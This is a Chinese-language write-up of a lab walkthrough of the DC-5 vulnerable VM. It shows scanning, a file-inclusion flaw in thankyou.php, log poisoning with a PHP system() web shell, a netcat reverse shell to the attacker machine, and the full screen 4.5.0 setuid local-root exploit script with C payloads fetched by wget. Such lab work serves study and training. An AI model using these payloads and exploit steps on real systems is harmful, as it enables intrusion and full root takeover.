主机发现
利用netdiscover
发现主机,192.168.203.130
端口扫描
利用Nmap
:
root@kali:~# nmap -sV -A 192.168.203.130 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 09:58 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.130
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.130
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.130:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.6.2
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34063/udp status
| 100024 1 40695/tcp status
| 100024 1 45211/udp6 status
|_ 100024 1 51852/tcp6 status
MAC Address: 00:0C:29:02:DC:93 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.203.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.29 seconds
nmap只扫出了80端口和111端口。
寻找Flag
我们先去80端口看一下web服务。
发现其就是一个普通的网站,也没有CMS,尝试扫一下目录。
目录扫描
利用kali中自带的dirb
root@kali:~/桌面# dirb http://192.168.203.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Feb 14 10:07:48 2020
URL_BASE: http://192.168.203.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.203.130/ ----
==> DIRECTORY: http://192.168.203.130/css/
==> DIRECTORY: http://192.168.203.130/images/
+ http://192.168.203.130/index.php (CODE:200|SIZE:4025)
---- Entering directory: http://192.168.203.130/css/ ----
---- Entering directory: http://192.168.203.130/images/ ----
-----------------
END_TIME: Fri Feb 14 10:07:56 2020
DOWNLOADED: 13836 - FOUND: 1
发现啥也没有。
思路再次返回到网站页面,唯一有交互的就是网站的Contact
部分。
这里我们可以提交一些内容。
……感觉也没啥可以利用的啊。
按照做靶机的惯性思路,这是一台linux机器,应该开22端口的,但是没有开,这可能是修改了端口,于是我决定再重新扫一下端口。
利用命令 nmap -sV -p 1-65535 192.168.203.130
果然!!多了一个40695端口。
尝试利用telnet
连接此端口,无果。
一下子……思路断了。
看了下大佬的提示,问题果然还是出在web服务里,那个提交页面。
当我们提交一个内容之后,会跳转到thankyou.php
。
每当我们刷新一次,最底下的Copyright
就会变化一次。
那为什么会出现这种情况呢?
文件包含漏洞
这里我们要讲到一个知识点,就是footer.php
凡是建过站的朋友应该都知道,footer.php
,它会输出网站的页脚信息,网站页面最下面的版权等其他关于网站的内容。所以在网站的根目下下会存在footer.php
。
那我们访问一下看看:
可以看到确实是存在的,并且每刷新一次,数字就变化一次。
那这样的话就讲的通了,thankyou.php
存在文件包含,且在默认情况下包含footer.php
。
接下里,验证漏洞的存在。包含/etc/passwd
。
包含成功!
利用漏洞
通过谷歌浏览器的插件,得知中间件为Nginx。
那我们可利用nginx的日志功能,将错误信息写入日志,以获取shell。
我先写一个phpinfo
,看是否利用成功。
<?php phpinfo();?>
利用成功。
那再直接写个利用系统命令的
<?php system($_GET['cmd']);?>
nc 192.168.203.129 7777 -e /bin/bash
直接在url中访问:
[http://192.168.203.130/thankyou.php?file=/var/log/nginx/access.log&cmd=nc 192.168.203.129 7777 -e /bin/bash
便反弹得到shell。
看了网站根目录,cat
了footer.php
如我所料,默认包含footer.php
。
提权
find / -user root -perm -4000 -print 2>/dev/null
发现一个screen。
利用searchsploit
寻找一下:
主要看一下41154.sh:
root@kali:~# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
按照说明,我们需要将:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
保存为libhax.c
。
将:
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
保存为rootshell.c
然后,我们按照要求进行编译。
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
使用wget
命令,将上述两个编译好的文件置入目标服务器的/tmp
目录下:
www-data@dc-5:/tmp$ wget 192.168.203.129:8080/libhax.so
wget 192.168.203.129:8080/libhax.so
converted 'http://192.168.203.129:8080/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/libhax.so' (UTF-8)
--2020-02-14 22:25:48-- http://192.168.203.129:8080/libhax.so
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'
libhax.so 100%[=====================>] 15.77K --.-KB/s in 0s
2020-02-14 22:25:48 (531 MB/s) - 'libhax.so' saved [16144/16144]
-----------------------------------------------------------------------------------
www-data@dc-5:/tmp$ wget http://192.168.203.129:8080/rootshell
wget http://192.168.203.129:8080/rootshell
converted 'http://192.168.203.129:8080/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/rootshell' (UTF-8)
--2020-02-14 22:24:42-- http://192.168.203.129:8080/rootshell
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'
rootshell 100%[=====================>] 16.44K --.-KB/s in 0s
然后继续在目标机器上执行脚本中剩下的命令:
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
最终再返回/tmp
中执行rootshell,即可获取root的shell。
www-data@dc-5:/tmp$ cd /etc
cd /etc
www-data@dc-5:/etc$ umask 000
umask 000
www-data@dc-5:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
<-D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@dc-5:/etc$ echo "[+] Triggering..."
echo "[+] Triggering..."
[+] Triggering...
www-data@dc-5:/etc$ screen -ls
screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
www-data@dc-5:/etc$ cd /tmp
cd /tmp
www-data@dc-5:/tmp$ ./roots
./rootshell
# whoami
whoami
root
#
-------------------------------------------------------------------------------
# cd /root
cd /root
# ls
ls
thisistheflag.txt
# cat thisistheflag.txt
cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.